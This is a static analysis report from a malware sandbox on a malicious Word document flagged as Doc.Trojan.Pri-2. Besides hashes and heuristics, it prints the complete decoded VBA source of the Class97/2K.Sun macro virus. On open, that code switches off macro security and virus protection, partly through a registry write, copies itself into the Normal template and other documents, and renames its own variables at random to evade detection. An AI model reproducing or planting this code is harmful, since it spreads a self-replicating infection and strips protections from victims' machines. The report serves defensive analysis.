Malicious Office (OLE) — malware analysis report

Static analysis result for SHA-256 884bf3f03263ad8f…

MALICIOUS

Office (OLE)

30.5 KB Created: 2001-05-01 15:16:00 Authoring application: Microsoft Word 8.0 First seen: 2012-06-14
MD5: 8ae925e695c583647b05a93c6c528638 SHA-1: e4aceb59fb95390804bbc5b431e7ddb2e3931799 SHA-256: 884bf3f03263ad8f5b4469f5085fa3312dd84d05a2f91fd55114a53bd7f1c565
180 Risk Score

Malware Insights

MITRE ATT&CK
T1059.005 Visual Basic T1547.001 Registry Run Keys / Startup Folder

The sample is a malicious Office document containing VBA macros. The Document_Open macro attempts to lower macro security settings by writing to the registry key HKEY_CURRENT_USER\Software\Microsoft\Office\9.0\Word\Security\Level. It also attempts to copy its code into the Normal template, likely to establish persistence. The ClamAV detection 'Doc.Trojan.Pri-2' further confirms its malicious nature.

Heuristics 3

  • ClamAV: Doc.Trojan.Pri-2 critical CLAMAV_DETECTION
    ClamAV detected this file as malware: Doc.Trojan.Pri-2
  • VBA macros detected medium 1 related finding OLE_VBA_MACROS
    Document contains VBA macro code
  • Document_Open macro high OLE_VBA_DOCOPEN
    Document_Open macro

Extracted artifacts 1

Files carved from inside the sample during analysis.

FilenameKindSourceSize
macros.bas vba-macro oletools.olevba.extract_macros (decoded VBA source) 10565 bytes
SHA-256: 723137ef52ac7db732d278499bb2efa6d1cc2520a06bcf7776cbef0f85fe3802
Detection
ClamAV: Doc.Trojan.Pri-2
Obfuscation or payload: unlikely
Preview script
First 1,000 lines of the extracted script
Attribute VB_Name = "ThisDocument"
Attribute VB_Base = "1Normal.ThisDocument"
Attribute VB_Creatable = False
Attribute VB_PredeclaredId = True
Attribute VB_Exposed = True
Attribute VB_TemplateDerived = True
Attribute VB_Customizable = True
Private Sub Document_Open()
On Error Resume Next: Randomize
Const Ve599148 = "9.0", Le725352 = "Macro", Jx370740 = 3, Lw258201 = 0, Au336951 = &H1, Bo669866 = 1
If Application.Version = Ve599148 Then
CommandBars(Le725352).Controls(Jx370740).Enabled = (Rnd * Lw258201)
System.PrivateProfileString("", "HKEY_CURRENT_USER\Software\Microsoft\Office\9.0\Word\Security", "Level") = Au336951
Else
Options.VirusProtection = (Rnd * Lw258201)
End If
Options.SaveNormalPrompt = (Rnd * Lw258201)
Set Sf57356 = ThisDocument.VBProject.VBComponents(Bo669866).CodeModule
If MacroContainer = ActiveDocument Then Set Rm11693 = NormalTemplate.VBProject.VBComponents(Bo669866).CodeModule Else Set Rm11693 = ActiveDocument.VBProject.VBComponents(Bo669866).CodeModule: Qe468747 = (Rnd * Bo669866)
If Sf57356.countoflines <> Rm11693.countoflines Then
Rm11693.deletelines Bo669866, Rm11693.countoflines
Rm11693.insertlines Bo669866, Nw53841(Sf57356.lines(Bo669866, Sf57356.countoflines))
If Qe468747 <> Lw258201 Then ActiveDocument.SaveAs ActiveDocument.FullName
End If
If Day(Now()) = Hour(Now()) Then
ActiveDocument.Shapes.AddShape(msoShapeSun, 160.05, 99.2, 342#, 117#).Select
With Selection
.ShapeRange.Fill.ForeColor.RGB = RGB(255, 255, Lw258201)
.ShapeRange.TextFrame.TextRange.Select
.TypeText Text:="Class97/2K.Sun" & Chr(11) & "by jackie twoflower" & Chr(11) & "Lz0NT/MVT"
.ParagraphFormat.Alignment = wdAlignParagraphCenter
End With
End If
End Sub
Private Function Nw53841(Vg813412) As String ' PVP v1.1
Const Lw258201 = 0, Bo669866 = 1, Gv23294 = 21, Dj66244 = 22, Ss45375 = 65, Ok831795 = 122, Gt820969 = 999
Dim Le946218(Bo669866 To Gv23294)
Le946218(1) = "Ve599148": Le946218(2) = "Le725352": Le946218(3) = "Jx370740": Le946218(4) = "Lw258201": Le946218(5) = "Au336951": Le946218(6) = "Bo669866": Le946218(7) = "Sf57356": Le946218(8) = "Rm11693"
Le946218(9) = "Gv23294": Le946218(10) = "Dj66244": Le946218(11) = "Ss45375": Le946218(12) = "Ok831795": Le946218(13) = "Gt820969": Le946218(14) = "Nw53841": Le946218(15) = "Le946218": Le946218(16) = "Kw691591"
Le946218(17) = "Rv887223": Le946218(18) = "Km438468": Le946218(19) = "Gk687354": Le946218(20) = "Vg813412": Le946218(21) = "Qe468747"
For Kw691591 = Bo669866 To Gv23294
Rv887223 = Chr(Ss45375 + Int(Rnd * Dj66244)) & Chr(Ok831795 - Int(Rnd * Dj66244)) & Int(Rnd * Gt820969) & Int(Rnd * Gt820969)
Km438468 = Bo669866
Gk687354: Km438468 = InStr(Km438468 + Bo669866, Vg813412, Le946218(Kw691591))
If Km438468 <> Lw258201 Then Vg813412 = Mid(Vg813412, Bo669866, (Km438468 - Bo669866)) & Rv887223 & Mid(Vg813412, (Km438468 + Len(Le946218(Kw691591))), Len(Vg813412)): GoTo Gk687354
Next
Nw53841 = Vg813412
End Function
' Class97/2K.Sun & PVP v1.1 written by jackie twoflower /Lz0NT/MVT
' Freedom will only be available through revolution or death...


' Processing file: /opt/analyzer/scan_staging/fa32d54da57846d5939b1b078bee9b82.bin
' ===============================================================================
' Module streams:
' Macros/VBA/ThisDocument - 5488 bytes
' Line #0:
' 	FuncDefn (Private Sub Document_Open())
' Line #1:
' 	OnError (Resume Next) 
' 	BoS 0x0000 
' 	ArgsCall Read 0x0000 
' Line #2:
' 	Dim (Const) 
' 	LitStr 0x0003 "9.0"
' 	VarDefn Ve599148
' 	LitStr 0x0005 "Macro"
' 	VarDefn Le725352
' 	LitDI2 0x0003 
' 	VarDefn Jx370740
' 	LitDI2 0x0000 
' 	VarDefn Lw258201
' 	LitHI2 0x0001 
' 	VarDefn Au336951
' 	LitDI2 0x0001 
' 	VarDefn Bo669866
' Line #3:
' 	Ld Application 
' 	MemLd Version 
' 	Ld Ve599148 
' 	Eq 
' 	IfBlock 
' Line #4:
' 	Ld Rnd 
' 	Ld Lw258201 
' 	Mul 
' 	Paren 
' 	Ld Jx370740 
' 	Ld Le725352 
' 	ArgsLd CommandBars 0x0001 
' 	ArgsMemLd Controls 0x0001 
' 	MemSt Enabled 
' Line #5:
' 	Ld Au336951 
' 	LitStr 0x0000 ""
' 	LitStr 0x003D "HKEY_CURRENT_USER\Software\Microsoft\Office\9.0\Word\Security"
' 	LitStr 0x0005 "
... (truncated)

Open this report in the interactive analyzer, or submit your own file for analysis.